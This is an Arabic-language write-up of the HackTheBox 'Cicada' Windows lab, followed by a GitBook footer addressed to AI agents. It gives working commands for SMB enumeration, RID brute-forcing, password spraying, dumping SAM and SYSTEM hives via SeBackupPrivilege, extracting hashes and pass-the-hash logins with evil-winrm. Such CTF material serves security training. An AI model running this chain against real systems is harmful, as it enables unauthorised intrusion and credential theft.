> For the complete documentation index, see [llms.txt](https://hacking-notes.jord4n.pro/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://hacking-notes.jord4n.pro/ar/writeups-ctf/hackthebox/windows-easy/cicada-hackthebox-writeup.md).

# شرح Cicada HackTheBox

{% embed url="<https://app.hackthebox.com/machines/Cicada>" %}

{% hint style="warning" %}
**المهارات:**

* استطلاع SMB (RID-Brute)
* تسرب المعلومات (وصف المستخدم) (netexec)
* تصعيد الصلاحيات (SeBackupPrivilege)
* استخراج SAM (pypykatz)
* Pass-the-Hash (EvilWinRM)
  {% endhint %}

## الاستطلاع

**إعداد مساحة العمل:**

قم بإعداد مساحة العمل بإنشاء ثلاثة مجلدات لتخزين المحتوى المهم، والاستغلالات، ونتائج استطلاع Nmap.

<figure><img src="/files/cd6022b2fe625070e368ca200b42079d2026493e" alt="" width="563"><figcaption></figcaption></figure>

**فحص اتصال VPN**

تحقق من اتصال VPN لضمان تواصل مستقر مع الجهاز المستهدف.

<figure><img src="/files/4d39b6baa0945388a07d568c5bc7262ca92b3443" alt="" width="563"><figcaption></figcaption></figure>

**اكتشاف المنافذ المفتوحة باستخدام Nmap:**

قم بحصر المنافذ المفتوحة وتصدير النتائج إلى الملف "allPorts" في دليل Nmap:

```bash
nmap -p- --open -sS -n -Pn -vvv --min-rate 5000 10.10.11.35 -oG allPorts
```

<figure><img src="/files/12a5d6d1ebc5e8d76f9d2ba52ecc3214d5638aac" alt=""><figcaption></figcaption></figure>

**تحليل المنافذ المفتوحة باستخدام extractPorts:**

باستخدام الدالة extractPorts لعرض المنافذ المفتوحة بصيغة مختصرة ونسخها إلى الحافظة (53.88,135,139.389,445,464,593,636,3268,3269,5985,5169)

<figure><img src="/files/800f4fdd58114adb49a504eadfb2f76cabb6db6c" alt=""><figcaption></figcaption></figure>

فحص إصدارات المنافذ باستخدام Nmap:

استخدم Nmap لفحص إصدارات الخدمات وحفظ الناتج في الملف "targeted":

```bash
nmap -sCV -p53,88,135,139,389,445,464,593,636,3268,3269,5985,55169 10.10.11.35 -oN targeted
```

<figure><img src="/files/98fa98ff0c76f83919aa6bc969d38355d50421a1" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/ac00a9e95d68ba8ee472918998a44df858caf60b" alt=""><figcaption></figcaption></figure>

لحل أسماء النطاقات إلى عناوين IP عبر DNS، يتم إدراج اسم النطاق المرتبط بعنوان IP الخاص به في `/etc/hosts` الملف:

<figure><img src="/files/f71d9da89e029fc502a4de78b5099c4039af094f" alt=""><figcaption></figcaption></figure>

### المنفذ 445 - SMB

**قائمة SMB باستخدام smbmap**

لسرد الموارد المشتركة بجلسة null:

```bash
smbmap -H 10.10.11.35 -u 'null'
```

<figure><img src="/files/8eda2aaaf7c4da70555d182d9a7d92f49610cf75" alt=""><figcaption></figcaption></figure>

الـ **HR** يحتوي المجلد على ملف نصي مثير للاهتمام. نستعرض محتواه:

```bash
smbmap -H 10.10.11.35 -u 'null' -r HR
```

<figure><img src="/files/62d9fbfa3a5f3cd8a746680353ec6ed99d65725d" alt=""><figcaption></figcaption></figure>

**تنزيل الملف**

نصل إلى المشاركة وننزّل الملف:

```bash
smbclient //10.10.11.35/HR -N
get "Notice from HR.txt"
```

<figure><img src="/files/02fad8fc55749430cb2b5bddf3265951b8168ee7" alt=""><figcaption></figcaption></figure>

يحتوي الملف على كلمة مرور

* كلمة المرور: `Cicada$M6Corpb*@Lp#nZp!8`

<figure><img src="/files/4395d4a4715c669be17e25f59d786908df3cb841" alt=""><figcaption></figcaption></figure>

## قائمة RID-Brute

#### لتحديد مستخدمي النطاق، نطلق هجوم RID-Brute:

```bash
crackmapexec smb 10.10.11.35 -u 'Guest' -p "" --rid-brute
```

> الـ `--rid-brute` يُستخدم هذا المعامل لتنفيذ /*/* هجوم بالقوة الغاشمة /*/* على **RID (المعرّفات المرتبطة)** المستخدمين في نطاق Windows. إن RID هو جزء من المعرّف الفريد للمستخدم في نظام Windows ويُستخدم عادةً لتحديد حسابات المستخدمين والمجموعات

<figure><img src="/files/92261f08e1138dfa6fb66868359d55018122e900" alt=""><figcaption></figcaption></figure>

إليك قائمة المستخدمين الذين تم العثور عليهم:

```
Administrator
Guest
krbtgt
CICADA-DC$
john.smoulder
sarah.dantelia
michael.wrightson
david.orelious
emily.oscars
```

#### التحقق من المستخدم

نختبر كلمة المرور التي عُثر عليها مع جميع المستخدمين:

```bash
crackmapexec smb 10.10.11.35 -u users.txt -p 'Cicada$M6Corpb*@Lp#nZp!8'
```

المستخدم **michael.wrightson** يستخدم هذه الكلمة المرور.

<figure><img src="/files/acc3cbf9e41f5775e9a71108dcee72c3201d8796" alt=""><figcaption></figcaption></figure>

### المستخدم Michael:

### الاستطلاع باستخدام netexec

نستخدم **michael.wrightson** بيانات الاعتماد لاستكشاف المزيد:

```bash
netexec smb 10.10.11.35 -u 'michael.wrightson' -p 'Cicada$M6Corpb*@Lp#nZp!8' --users
```

<figure><img src="/files/27fa7d40d91f69e705140b2393969608bd44bc46" alt=""><figcaption></figcaption></figure>

يكشف هذا عن كلمة مرور المستخدم الصريحة **david.orelious**:

* اسم المستخدم: `david.orelious`
* كلمة المرور: `aRt$Lp#7t*VQ!3`

/*/التحقق واستطلاع SMB باستخدام بيانات الاعتماد في //* **david.orelious**

### الانتقال إلى المستخدم David

نُتحقق من بيانات اعتماد david.orelious باستخدام CrackMapExec:

```bash
crackmapexec smb 10.10.11.35 -u 'david.orelious' -p 'aRt$Lp#7t*VQ!3'
```

<figure><img src="/files/ef55384db7a3b42415b0e845d67f7746a13bbb95" alt=""><figcaption></figcaption></figure>

ثم نستكشف مشاركات SMB المتاحة على الهدف باستخدام smbmap:

```bash
smbmap -H 10.10.11.35 -u david.orelious
```

<figure><img src="/files/d8e4fe3564b5b29aff7fbe3eb0b06d8d07dfc436" alt=""><figcaption></figcaption></figure>

ثم نتصل بالمشاركة DEV باستخدام smbclient:

```bash
smbclient //10.10.11.35/DEV -U david.orelious
```

في هذه المشاركة نجد سكربتًا باسم backup/ script.ps1.

<figure><img src="/files/7cf9b936a26c1bcbe2eaf1ff25f436da87ccd988" alt=""><figcaption></figcaption></figure>

### الانتقال إلى المستخدم Emily

ننزل السكربت backup/ script.ps1 باستخدام الأمر get ونكتشف معرّفات المستخدم emily.oscars

* اسم المستخدم: emily.oscars
* كلمة المرور: Q!3\@Lp#M6b/\*7t/\*Vt

<figure><img src="/files/721c1c948530cdf3bb2f486b37e4d7663ef916d2" alt=""><figcaption></figcaption></figure>

نؤكد صحة هذه البيانات باستخدام CrackMapExec:

```bash
crackmapexec smb 10.10.11.35 -u 'emily.oscars' -p 'Q!3@Lp#M6b*7t*Vt'
```

ثم نتصل بالجهاز باستخدام Evil-WinRM:

```bash
evil-winrm -i 10.10.11.35 -u 'emily.oscars' -p 'Q!3@Lp#M6b*7t*Vt'
```

<figure><img src="/files/6d429f8de6f1e058fb30094220d3e6858c07d2e2" alt=""><figcaption></figcaption></figure>

### الراية user.txt

نستخرج العلم من ملف user.txt.

<figure><img src="/files/dfe2b8f6123cce8464d5c205995bd1ef99b6880f" alt=""><figcaption></figcaption></figure>

## تصعيد الامتيازات

### whoami /priv - SeBackupPrivilege

{% embed url="<https://starlox.medium.com/windows-privesc-with-sebackupprivilege-enable-b9e949219caf>" %}

**التحقق من الصلاحيات**

للبداية، لنتحقق من صلاحيات المستخدم الحالي. شغّل الأمر التالي للتحقق مما إذا كان المستخدم يملك `SeBackupPrivilege` الامتياز:

```bash
whoami /priv
```

<figure><img src="/files/a12d8a8dcba233cabf5a211836ddfed95a942cf4" alt=""><figcaption></figcaption></figure>

**تنزيل ملفات DLL اللازمة**

لاستغلال هذه الصلاحيات، قم بتنزيل ملفات DLL إلى جهاز الضحية. وهي متاحة [هنا](https://github.com/giuliano108/SeBackupPrivilege).

1. **SeBackupPrivilegeCmdLets.dll**

{% embed url="<https://github.com/giuliano108/SeBackupPrivilege/blob/master/SeBackupPrivilegeCmdLets/bin/Debug/SeBackupPrivilegeCmdLets.dll>" %}

2. **SeBackupPrivilegeUtils.dll**

{% embed url="<https://github.com/giuliano108/SeBackupPrivilege/blob/master/SeBackupPrivilegeCmdLets/bin/Debug/SeBackupPrivilegeUtils.dll>" %}

نزّل هذه الملفات إلى جهاز الضحية باستخدام الأوامر التالية

```powershell
upload SeBackupPrivilegeCmdLets.dll
upload SeBackupPrivilegeUtils.dll
```

<figure><img src="/files/fe41d5d2c334276183029c841e1b2f816a056944" alt=""><figcaption></figcaption></figure>

**تحميل وحدات DLL**

بعد تنزيل ملفات DLL، حمّلها في جلسة PowerShell باستخدام الأوامر التالية:

```powershell
Import-Module ./SeBackupPrivilegeCmdLets.dll
Import-Module ./SeBackupPrivilegeUtils.dll
```

**نسخ ملفات SAM وSYSTEM احتياطيًا**

سنحفظ الآن `SAM` و `SYSTEM` الملفات التي تحتوي على معلومات تعريف المستخدم. استخدم الأوامر التالية لحفظها:

```powershell
reg save hklm/sam sam
reg save hklm/system system
```

<figure><img src="/files/e7c571e0741b351671e6423a3e4eb18ff84e0b54" alt=""><figcaption></figcaption></figure>

**تنزيل ملفات SAM وSYSTEM**

بعد حفظ الملفات، يمكنك تنزيلها إلى جهازك الافتراضي (VM) لفحصها:

```powershell
download sam
download system
```

<figure><img src="/files/54bc90e1b0c555bb8d6d035e8dcf12c292b10468" alt=""><figcaption></figcaption></figure>

### **استخراج الهاشات من ملف SAM**

استخدم `samdump2` لاستخراج الهاشات من `SAM` و `SYSTEM` الملفات:

```bash
samdump2 system sam
```

<figure><img src="/files/d449908b718a3a3d1190dd2b9e4df5e155b1a17c" alt=""><figcaption></figcaption></figure>

إذا لم يعمل هذا الأمر، يمكنك تجربة `pypykatz` لاستخراج الهاشات مباشرةً:

```bash
pypykatz registry system --sam sam
```

<figure><img src="/files/ba8a241e26d45b67fb0de868e5a087d9be93ecbe" alt=""><figcaption></figcaption></figure>

ينبغي أن يوفر ذلك هاشًا صالحًا، على سبيل المثال:

* الهاش: `2b87e7c93a3e8a0ea4a581937016f341`

### **تمرير التجزئة باستخدام Evil-WinRM**

الآن بعد أن حصلت على الهاش، يمكنك استخدامه لتنفيذ هجوم "Pass-the-Hash" والاتصال بجهاز الهدف باستخدام `evil-winrm`:

```bash
evil-winrm  -i 10.10.11.35 -u administrator -H 2b87e7c93a3e8a0ea4a581937016f341
```

<figure><img src="/files/43936558b91add9eaaee0ef1af9998e4fa2f55b1" alt=""><figcaption></figcaption></figure>

### العلم root.txt :)

<figure><img src="/files/c3f586316af1c463572ba5046205133a33bddcec" alt="" width="563"><figcaption></figcaption></figure>

<figure><img src="/files/59e476ba377a33b76de6367634db8f6e885328d3" alt=""><figcaption></figcaption></figure>


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://hacking-notes.jord4n.pro/ar/writeups-ctf/hackthebox/windows-easy/cicada-hackthebox-writeup.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
